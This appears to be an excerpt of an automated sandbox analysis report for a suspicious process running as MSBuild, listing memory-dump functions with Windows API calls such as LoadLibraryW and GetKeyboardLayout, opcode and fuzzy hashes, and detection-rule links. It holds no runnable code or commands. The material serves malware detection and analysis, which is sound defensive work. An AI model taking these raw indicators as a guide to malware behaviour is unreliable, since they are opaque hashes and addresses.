                                                                                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                                                                                • Opcode ID: ec6edaf1f85aac94204ddb3d158f6a82ca9d5438a726bf092247e15b3d305bec
                                                                                                                                                                                                                                                • Instruction ID: 55fcc4064f23d21faba1439576704d47208938fd35683f43552f3c7111942fef
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec6edaf1f85aac94204ddb3d158f6a82ca9d5438a726bf092247e15b3d305bec
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4621E6B5900248DFDB10CFA9D585BEEBBF5FB48310F14842AE958A7350C3789945CF65
                                                                                                                                                                                                                                                Function 0709EB08 Relevance: 1.6, Strings: 1, Instructions: 314COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                                                                                                                • Opcode ID: a0ac8e28d8bda1429f775287da2ba1da5ba79a99c6cc08eac7d6e36627a7abc0
                                                                                                                                                                                                                                                • Instruction ID: c32b81b3515b7d2f3f54db286cb5639364267fc6f1d6a58a28c4919657f0bd26
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a0ac8e28d8bda1429f775287da2ba1da5ba79a99c6cc08eac7d6e36627a7abc0
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AEC15B75600602DFCB24CF58C4809AAB7F6FF88314B1ACA69D55A8B7A1D730FD46CB90
                                                                                                                                                                                                                                                Function 0727E7D9 Relevance: 1.6, APIs: 1, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LdrLoadDll.NTDLL(?,?,?,?), ref: 0727E85D
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674082269.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7270000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Load
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2234796835-0
                                                                                                                                                                                                                                                • Opcode ID: 26499615436ca7e0770e07fb30b7f812c77c53013387a316d982d6267bf6b38a
                                                                                                                                                                                                                                                • Instruction ID: 17aa3f8c6d96fba5f64b8dc228776a06b4f0430bf72517312f9ac070fd883381
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 26499615436ca7e0770e07fb30b7f812c77c53013387a316d982d6267bf6b38a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FB21E2B1D002599FDB10DFAAD885BDEFBF5BB48320F10842AE919A7250C7759940CBA5
                                                                                                                                                                                                                                                Function 0153EED0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0153EF57
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1649027933.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1530000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                                                                                                                                • Opcode ID: 1dfdc943446ab3dec3db1786d536e38d092198bd4b6dc6079353aaa1426f246a
                                                                                                                                                                                                                                                • Instruction ID: 49f1daa776eb26c2624e611d0346cff74ad701ce476721713b7f037e31b1b127
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1dfdc943446ab3dec3db1786d536e38d092198bd4b6dc6079353aaa1426f246a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C021D5B5900248DFDB10CFAAD885ADEFBF5FB48310F14841AE918A7350D375A944CFA5
                                                                                                                                                                                                                                                Function 07271500 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 0727156E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674082269.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7270000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                                                • Opcode ID: 0cef083fbb36913ff681808954bb0484b346e4e57419c71c174d912daaec4002
                                                                                                                                                                                                                                                • Instruction ID: b0f11b9079cf7522a09d22dd2801fa42048a6a8c9fa263d65e0a331e39437902
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0cef083fbb36913ff681808954bb0484b346e4e57419c71c174d912daaec4002
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2D1137B6C0035A8FDB10CFAAC444BDEFBF4EF88214F14842AD419A7650D378A545CFA5
                                                                                                                                                                                                                                                Function 071C05E8 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetKeyboardLayout.USER32(00000000), ref: 071C065E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672819323.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71c0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: KeyboardLayout
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 194098044-0
                                                                                                                                                                                                                                                • Opcode ID: 18163263d27982668433079957620cdeed3f54c3e917b4de87a3c879761eb609
                                                                                                                                                                                                                                                • Instruction ID: 4524d6019fe1cc6edc191cf80fc9bf947fbec2dada3a781928990df76c9b9dbd
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 18163263d27982668433079957620cdeed3f54c3e917b4de87a3c879761eb609
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5115BB5900349CFCB10DFA9D4497DEBFF4EB49210F108869D515AB380D779A944CFA5
                                                                                                                                                                                                                                                Function 07271508 Relevance: 1.6, APIs: 1, Instructions: 50libraryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 0727156E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674082269.0000000007270000.00000040.00000800.00020000.00000000.sdmp, Offset: 07270000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7270000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1029625771-0
                                                                                                                                                                                                                                                • Opcode ID: 524976e9e0700b3d677d02c8cb32bb30f933a5849ceb3420b13aa01deaf34189
                                                                                                                                                                                                                                                • Instruction ID: 32ee7fcc9038b0beddce9244d11b43be40bb2ce62844c46669f472393e35affc
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 524976e9e0700b3d677d02c8cb32bb30f933a5849ceb3420b13aa01deaf34189
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 861102B6C003498FDB24CFAAC844BDEFBF5AF88224F14842AD429A7210D375A545CFA5
                                                                                                                                                                                                                                                Function 071C06F0 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672819323.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71c0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                                                                                                • Opcode ID: 99d80c70cd8b4217213c727e3171d339ec8aefaa0803f1b853a42361f6a92f7a
                                                                                                                                                                                                                                                • Instruction ID: f9cf60feabe82119f1572b8e2a20e9d707f0d77e584c0fe911cfcf3720c84d1a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99d80c70cd8b4217213c727e3171d339ec8aefaa0803f1b853a42361f6a92f7a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C01103B5900348DFDB20DF9AD845BDEBBF4AB48320F20845AE559A7640C379A544CFA6
                                                                                                                                                                                                                                                Function 0747C4B4 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0747CF25
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674878063.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7470000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                                                                                                • Opcode ID: 92aadf9d8786ac8d1e4c516a38a44bee9bb86cc1325572bf8d4797d27aec957f
                                                                                                                                                                                                                                                • Instruction ID: 320e027d05f82c019d9f77e1d423dca207f1b44d8545164a3e95178a5e4ca002
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92aadf9d8786ac8d1e4c516a38a44bee9bb86cc1325572bf8d4797d27aec957f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8A11F5B58003499FDB20DF9AC485BDFBBF8FB48310F10881AE515A7240C375A944CFA1
                                                                                                                                                                                                                                                Function 0153C7D8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNELBASE(00000000), ref: 0153C83E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1649027933.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_1530000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HandleModule
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                                                                                                                                • Opcode ID: ec0420016c470411ce54f47de05d64caaed1343841822ae1f61ae5a5e67d8846
                                                                                                                                                                                                                                                • Instruction ID: 949b30d87553a9c407f69252ac28c4386b0b781bc6b9b3338c3c951dd12ba320
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ec0420016c470411ce54f47de05d64caaed1343841822ae1f61ae5a5e67d8846
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C911DFB6C002498FDB10CF9AD444BDEFBF4AB88224F10846AD529B7610D375A645CFA5
                                                                                                                                                                                                                                                Function 0747CEC0 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0747CF25
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674878063.0000000007470000.00000040.00000800.00020000.00000000.sdmp, Offset: 07470000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7470000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: MessagePost
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 410705778-0
                                                                                                                                                                                                                                                • Opcode ID: f3889fd90437b0f3459cdf63d13b1d9c2d0cb796704af5651cf43d8646049b49
                                                                                                                                                                                                                                                • Instruction ID: 88a5f81e25179428202b3242c6b9bde685d574acc8d63ea2c4986e0bed3e90c4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f3889fd90437b0f3459cdf63d13b1d9c2d0cb796704af5651cf43d8646049b49
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 451103B59002499FDB20CF9AD485BDEBFF8EB48324F10845AE558A7240C374A944CFA1
                                                                                                                                                                                                                                                Function 071C05F8 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetKeyboardLayout.USER32(00000000), ref: 071C065E
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672819323.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71c0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: KeyboardLayout
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 194098044-0
                                                                                                                                                                                                                                                • Opcode ID: 6fc995480d1937612833f6b3ea850af9baa5ebd8ea9df9437c1c0a456f6c8b4d
                                                                                                                                                                                                                                                • Instruction ID: 57ee5c2c2a1097161639f7c49782c0b04225470b16a9b6d85ba183401197c8c2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6fc995480d1937612833f6b3ea850af9baa5ebd8ea9df9437c1c0a456f6c8b4d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A01136B4900349CFCB20DFA9C5497EEBBF4FB88210F108829D519AB380D779A944CFA5
                                                                                                                                                                                                                                                Function 071C06F8 Relevance: 1.5, APIs: 1, Instructions: 43comCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672819323.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71c0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Initialize
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2538663250-0
                                                                                                                                                                                                                                                • Opcode ID: f6a79500389a30377ab31917e39318c117a89e52dee8480df8f290e7a3059c07
                                                                                                                                                                                                                                                • Instruction ID: 173406e742f537d00543d5731b39029121c733d734c1bf545bb1c54598ebc62a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f6a79500389a30377ab31917e39318c117a89e52dee8480df8f290e7a3059c07
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 091112B58003488FDB20DF9AD885BDEBBF4EB48220F20845AE559A7240C374A544CFA5
                                                                                                                                                                                                                                                Function 072A6D30 Relevance: 1.5, Strings: 1, Instructions: 238COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                                                                                                                • Opcode ID: 80f96ad0be5ac82838a5c0037a7ed7a0803b2894f29e6fb68e4812dfed8c50b2
                                                                                                                                                                                                                                                • Instruction ID: 7a8ccec0d389b0bdbe9efd3c860ff2a47ac8ca2a62e9f89a772bb1bbf2d2bbed
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 80f96ad0be5ac82838a5c0037a7ed7a0803b2894f29e6fb68e4812dfed8c50b2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44919CB0600606AFD714CF29D88096AFBB6FF84320B18C669D96ACBA51D731FC55CBD0
                                                                                                                                                                                                                                                Function 07097758 Relevance: 1.4, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 0-2564639436
                                                                                                                                                                                                                                                • Opcode ID: 9c0d0174e43b9444720bd10490fbc97d827ec0b50ce4a8a5217af1015f19c695
                                                                                                                                                                                                                                                • Instruction ID: f0ec39fa0077eee46fc00e7c7f5f33267545055f23e173ace46528ec2569a960
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9c0d0174e43b9444720bd10490fbc97d827ec0b50ce4a8a5217af1015f19c695
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E47189B5A106069FCF15DF59C4808AAF7F6FF88310B10C66AD91997615DB30F851CFA0
                                                                                                                                                                                                                                                Function 071B4088 Relevance: 1.4, Strings: 1, Instructions: 149COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                                                                                                                • Opcode ID: 02a89ee03e30ee4c2878726ff3c4e636d3510e6b4799ce667f736194b6a250c1
                                                                                                                                                                                                                                                • Instruction ID: 27dfdf711dc4149b092995918dbf7f9b3bd5894d1268523b82d77226ed9bc19d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02a89ee03e30ee4c2878726ff3c4e636d3510e6b4799ce667f736194b6a250c1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 30514DB5A002559FDB15CFA8C884AEEBBF2FF98210F15C065ED15AB292D730E945CB90
                                                                                                                                                                                                                                                Function 07093C10 Relevance: 1.4, Instructions: 1386COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1671996709.0000000007090000.00000040.00000800.00020000.00000000.sdmp, Offset: 07090000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_7090000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 61ca02f93cf4706d9877991330872ea52f9a8bd3997484ccdd230d0f2c891054
                                                                                                                                                                                                                                                • Instruction ID: 5b05ab0136b3fe21d94a26259c7cb00113bb009b9a8fd7e5b2d5103a037696f3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61ca02f93cf4706d9877991330872ea52f9a8bd3997484ccdd230d0f2c891054
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 47E2FD74A00219DFEB54EFA0EC54BADB733FB88311F108198DA0A2B795CA312E85DF55
                                                                                                                                                                                                                                                Function 071BF358 Relevance: 1.4, Strings: 1, Instructions: 130COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: "
                                                                                                                                                                                                                                                • API String ID: 0-123907689
                                                                                                                                                                                                                                                • Opcode ID: 3be566f344f227951bf06455ba4331f692ce602490ae8447a9badd0c26a44ac2
                                                                                                                                                                                                                                                • Instruction ID: c5e389b34b306378a141fa0b0ee1ae9895189650a68774ff4df7c3610589def7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3be566f344f227951bf06455ba4331f692ce602490ae8447a9badd0c26a44ac2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 60418DB5310511CFC76DDF28D96486D7BA6BB8920071206A8E507CB3E6CF3CED028B81
                                                                                                                                                                                                                                                Function 072A5458 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: U
                                                                                                                                                                                                                                                • API String ID: 0-3372436214
                                                                                                                                                                                                                                                • Opcode ID: 143c01aa584ce63ea35f8c2652cc96876e118890cf58006db4d3f6ea696bda6d
                                                                                                                                                                                                                                                • Instruction ID: 4f36fd25a9b55baa2b502fbb2413a62f3f5daa29fb9a9d8cdb4967bf05f1d60e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 143c01aa584ce63ea35f8c2652cc96876e118890cf58006db4d3f6ea696bda6d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CF41E630A043458FCB14DF35D498AAEBBF3EF85321B14C56AE4468B292CB35ED59CB51
                                                                                                                                                                                                                                                Function 071B4079 Relevance: 1.3, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1672701510.00000000071B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071B0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_71b0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                • API String ID: 0-2766056989
                                                                                                                                                                                                                                                • Opcode ID: 88bb9b7a54f2ddd5316fb7e265353cee85b5e29db51f25987984c3e030b558aa
                                                                                                                                                                                                                                                • Instruction ID: 63625293e24a6bee2997991160e88690214b9f13274ae212c7dee2dca0720fc2
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 88bb9b7a54f2ddd5316fb7e265353cee85b5e29db51f25987984c3e030b558aa
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9C21A3B1A00259EFCB25CFA4C884EEE7BF9EF88310F148165E915D7251D734E950CB90
                                                                                                                                                                                                                                                Function 072A58A0 Relevance: 1.0, Instructions: 983COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 074702b62172718a64aa5483e625f5459ec2a9e9912eb934624afb441d69add1
                                                                                                                                                                                                                                                • Instruction ID: 141cc0975f4b6d4dac35792b9dc24602f8d4f087039d847349fe2da032ec72b0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 074702b62172718a64aa5483e625f5459ec2a9e9912eb934624afb441d69add1
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E09235B4E40208EFEB259FA0D959BEDBB32FB48305F10C059EA496B7C0CA7A5945DF11
                                                                                                                                                                                                                                                Function 072A58B0 Relevance: 1.0, Instructions: 972COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1674186763.00000000072A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072A0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_72a0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7538907e6c93e59067acac053ba8a306effc8bdc20c1cc0af65237005740a610
                                                                                                                                                                                                                                                • Instruction ID: bace24d41153adfb18e2827ad0beacf86ec3e490087b282aa46d026c68868f9d
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7538907e6c93e59067acac053ba8a306effc8bdc20c1cc0af65237005740a610
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 919235B4E40208EFEB259FA0D959BADBB32FB48305F10C059EA496B7C0CB7A5945DF11
                                                                                                                                                                                                                                                Function 054E0048 Relevance: .9, Instructions: 874COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000008.00000002.1667172186.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_8_2_54e0000_MSBuild.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 4e77559f39118af22356dc718e08d5379a883be1facdec0d67da3b2ceb0b507b
                                                                                                                                                                                                                                                • Instruction ID: 882224b0bd8c340b8e0d117ee98e76821eb95a8aaf03267fdd3103b99660eb0c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e77559f39118af22356dc718e08d5379a883be1facdec0d67da3b2ceb0b507b
